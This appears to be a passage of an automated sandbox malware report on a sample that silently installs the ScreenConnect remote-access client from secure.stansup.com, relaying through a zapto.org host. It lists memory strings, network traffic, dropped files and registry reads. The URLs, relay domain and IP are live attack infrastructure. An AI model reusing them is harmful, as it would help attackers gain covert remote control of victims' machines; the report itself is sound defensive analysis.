                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383787727.000001E11B910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000008.00000003.1383787727.000001E11B910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD0924000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.staP
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD0489000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD0924000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.000000000156D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Cli
                  Source: Qjq85KfhBC.exe, 00000000.00000002.1445501228.000000000109C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicat
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2239737047.0000021CEA8E0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD051A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1754297358.000000000328F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1754297358.0000000003281000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.000000000163C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.000000000163C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application#
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD051A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.a
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD051A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.apdr
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1753827048.00000000017E4000.00000004.00000020.00020000.00000000.sdmp, 3Q2U6NXT.log.1.drString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicat
                  Source: dfsvc.exe, 00000001.00000002.2238360883.0000021CE8AA7000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1756206206.000000001BC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application%
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.00000000015F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application(
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application.
                  Source: dfsvc.exe, 00000001.00000002.2239737047.0000021CEA8E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application89G
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application89O
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.000000000163C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application9
                  Source: 3Q2U6NXT.log.1.drString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.or
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1754297358.000000000328F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationX
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationXZ4
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.000000000163C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationZ4
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationfts
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.000000000163C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationg
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.000000000163C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationng
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationp
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationtm
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD0924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.dll
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1754297358.000000000328F000.00000004.00000800.00020000.00000000.sdmp, 3Q2U6NXT.log.1.drString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD041A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.dllY
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.exeo
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD0924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windo
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD0924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.2239737047.0000021CEA8E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windows.dllL
                  Source: dfsvc.exe, 00000001.00000002.2239737047.0000021CEA8E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config0
                  Source: dfsvc.exe, 00000001.00000002.2239737047.0000021CEA8E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.configC
                  Source: dfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe:U
                  Source: dfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exebT
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsCl
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exek
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.configHW
                  Source: dfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.configrW6z
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe7
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B955000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B92C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.10:49702 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.10:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.10:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.10:49725 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Reads the Security eventlog
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Reads the System eventlog
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect

                  System Summary

                  barindex
                  Detected potential unwanted application
                  Source: Qjq85KfhBC.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_0091A4950_2_0091A495
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFEDAF4F1_2_00007FF7BFEDAF4F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFEF5D321_2_00007FF7BFEF5D32
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFEF3C301_2_00007FF7BFEF3C30
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFF0ABC51_2_00007FF7BFF0ABC5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFF024611_2_00007FF7BFF02461
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFEE327D1_2_00007FF7BFEE327D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFEF31011_2_00007FF7BFEF3101
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFF0ED2F1_2_00007FF7BFF0ED2F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFEDF4411_2_00007FF7BFEDF441
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFED12401_2_00007FF7BFED1240
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFED61781_2_00007FF7BFED6178
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF7BFED759C10_2_00007FF7BFED759C
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF7BFED1B3810_2_00007FF7BFED1B38
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF7BFED1AC010_2_00007FF7BFED1AC0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 12_2_0191335712_2_01913357
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 12_2_040DD1AB12_2_040DD1AB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 12_2_0574AF3012_2_0574AF30
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 12_2_0574343012_2_05743430
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7BFEC717C13_2_00007FF7BFEC717C
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7BFEC10D713_2_00007FF7BFEC10D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7BFEC10CF13_2_00007FF7BFEC10CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7BFEC173013_2_00007FF7BFEC1730
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7BFEC16FA13_2_00007FF7BFEC16FA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7C01D69FB13_2_00007FF7C01D69FB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7C01E4C4D13_2_00007FF7C01E4C4D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7C01DDC1D13_2_00007FF7C01DDC1D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7C01DAE0C13_2_00007FF7C01DAE0C
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7C01D579013_2_00007FF7C01D5790
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7C01D69F813_2_00007FF7C01D69F8
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7648 -ip 7648
                  Source: Qjq85KfhBC.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal60.evad.winEXE@18/77@2/2
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00911000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00911000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7648
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
